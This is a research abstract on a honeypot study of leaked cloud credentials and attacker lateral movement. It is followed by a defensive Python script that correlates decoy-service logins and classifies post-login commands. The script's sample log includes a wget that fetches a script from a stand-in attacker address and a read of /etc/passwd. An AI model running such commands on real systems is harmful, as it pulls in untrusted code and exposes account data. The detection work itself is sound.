Hack My Company: An Empirical Assessment of Post-exploitation Behavior and Lateral Movement in Cloud Environments

Cloud infrastructures and services are essential to enterprise operations: they form a central point for storing, processing and exchanging data, so their security properties are tightly bound to the protection of an enterprise's most confidential and important data. In this work, a credential leak is simulated on several platforms, exposing authentication information for several accounts on a cloud application service. Each leaked account in turn holds further authentication information for additional infrastructure: an e-mail server, an industrial control system and an enterprise-related streaming server. In addition, a homepage with information on the fictitious persons behind the leaked accounts was published. All interaction with these servers is closely monitored. Around one third of all trespassers conducted lateral movement, and successful authentications frequently resulted in system enumeration and file operations.
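As an added example (not code from the paper, which only reports its findings here), the following Python script shows how logins and post-authentication commands collected from several decoy services can be correlated per source address to flag the kind of lateral movement the abstract describes. The log format, the service names (cloudapp, mail, ics, stream), the rule that e-mail, ICS and streaming credentials are only obtainable through a cloud-app account, the command classes and the sample log lines are all assumptions constructed for illustration.

```python
"""Correlating honeytoken logins across decoy services to spot lateral movement.

Added example, not the paper's code. Log format, service names, the 'seeded via'
topology and the sample lines are constructed assumptions. Assumed line format:
    <ISO-8601 ts> <service> <src_ip> AUTH <user> <ok|fail>
    <ISO-8601 ts> <service> <src_ip> CMD  <user> <command line>
"""
import re
from dataclasses import dataclass, field

# Assumed decoy topology: credentials for these services are only exposed inside the
# cloud-app accounts, so reaching one of them after a cloud-app login is a lateral move.
SEEDED_VIA = {"mail": "cloudapp", "ics": "cloudapp", "stream": "cloudapp"}

# Coarse command classes (first token only) for post-authentication behaviour.
ENUM_CMDS = {"whoami", "id", "uname", "ls", "cat", "ps", "netstat", "ifconfig", "ip", "env"}
FILE_CMDS = {"cp", "mv", "rm", "wget", "curl", "scp", "tar", "chmod", "touch"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<service>\S+) (?P<ip>\S+) (?P<kind>AUTH|CMD) (?P<user>\S+) (?P<rest>.*)$"
)

# Constructed sample log (RFC 5737 test addresses); not data from the study.
SAMPLE_LOG = """\
2019-03-01T10:00:02Z cloudapp 203.0.113.7 AUTH alice.m ok
2019-03-01T10:00:09Z cloudapp 203.0.113.7 CMD alice.m ls
2019-03-01T10:00:15Z cloudapp 203.0.113.7 CMD alice.m whoami
2019-03-01T10:01:30Z mail 203.0.113.7 AUTH alice.m ok
2019-03-01T11:12:00Z cloudapp 198.51.100.23 AUTH bob.k fail
2019-03-01T11:12:07Z cloudapp 198.51.100.23 AUTH bob.k ok
2019-03-01T11:12:40Z cloudapp 198.51.100.23 CMD bob.k wget http://198.51.100.23/x.sh
2019-03-02T02:40:10Z cloudapp 192.0.2.45 AUTH carol.s ok
2019-03-02T02:40:19Z cloudapp 192.0.2.45 CMD carol.s uname -a
2019-03-02T02:44:03Z ics 192.0.2.45 AUTH plc-admin ok
2019-03-02T02:44:51Z ics 192.0.2.45 CMD plc-admin cat /etc/passwd
2019-03-02T02:50:12Z stream 192.0.2.45 AUTH carol.s ok
2019-03-03T09:05:00Z stream 198.51.100.99 AUTH dave.t ok
2019-03-03T09:05:20Z stream 198.51.100.99 CMD dave.t ls
"""


@dataclass
class Event:
    ts: str
    service: str
    ip: str
    kind: str
    user: str
    rest: str  # 'ok'/'fail' for AUTH, the command line for CMD


@dataclass
class Trespasser:
    ip: str
    authenticated: list = field(default_factory=list)  # services, in order of first success
    failed_logins: int = 0
    lateral_moves: list = field(default_factory=list)  # (seeding service, reached service)
    unlinked_logins: int = 0  # seeded service reached without a prior seeding login from this IP
    enumeration: int = 0
    file_ops: int = 0


def parse_log(text):
    """Parse log lines into Events sorted by timestamp (ISO-8601 sorts lexically)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line.strip())
        if m is None:
            raise ValueError(f"unparseable log line: {line!r}")
        events.append(Event(**m.groupdict()))
    events.sort(key=lambda e: e.ts)
    return events


def classify_command(cmdline):
    """Map a command line to 'enumeration', 'file_op' or 'other' by its first token."""
    tokens = cmdline.split()
    head = tokens[0] if tokens else ""
    return "enumeration" if head in ENUM_CMDS else "file_op" if head in FILE_CMDS else "other"


def analyze(events):
    """Group events by source IP; flag lateral movement and classify post-auth commands."""
    by_ip = {}
    for e in events:
        t = by_ip.setdefault(e.ip, Trespasser(ip=e.ip))
        if e.kind == "AUTH":
            if e.rest != "ok":
                t.failed_logins += 1
                continue
            seed = SEEDED_VIA.get(e.service)
            if seed is not None and e.service not in t.authenticated:
                if seed in t.authenticated:
                    t.lateral_moves.append((seed, e.service))
                else:
                    # The leaked secret arrived from a source that never logged into the
                    # seeding service: shared/sold credential or a different exit address.
                    t.unlinked_logins += 1
            if e.service not in t.authenticated:
                t.authenticated.append(e.service)
        else:
            kind = classify_command(e.rest)
            if kind == "enumeration":
                t.enumeration += 1
            elif kind == "file_op":
                t.file_ops += 1
    return by_ip


def lateral_movement_share(by_ip):
    """Fraction of trespassers with at least one successful login that moved laterally."""
    active = [t for t in by_ip.values() if t.authenticated]
    return sum(1 for t in active if t.lateral_moves) / len(active) if active else 0.0


if __name__ == "__main__":
    results = analyze(parse_log(SAMPLE_LOG))
    for t in results.values():
        print(t)
    print(f"lateral movement share: {lateral_movement_share(results):.2f}")
```

Keying on the source address is deliberately simple; in practice the same leaked credential may be exercised from a different exit address, which is why logins to a seeded service with no prior cloud-app login from that address are counted separately as unlinked rather than silently dropped.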
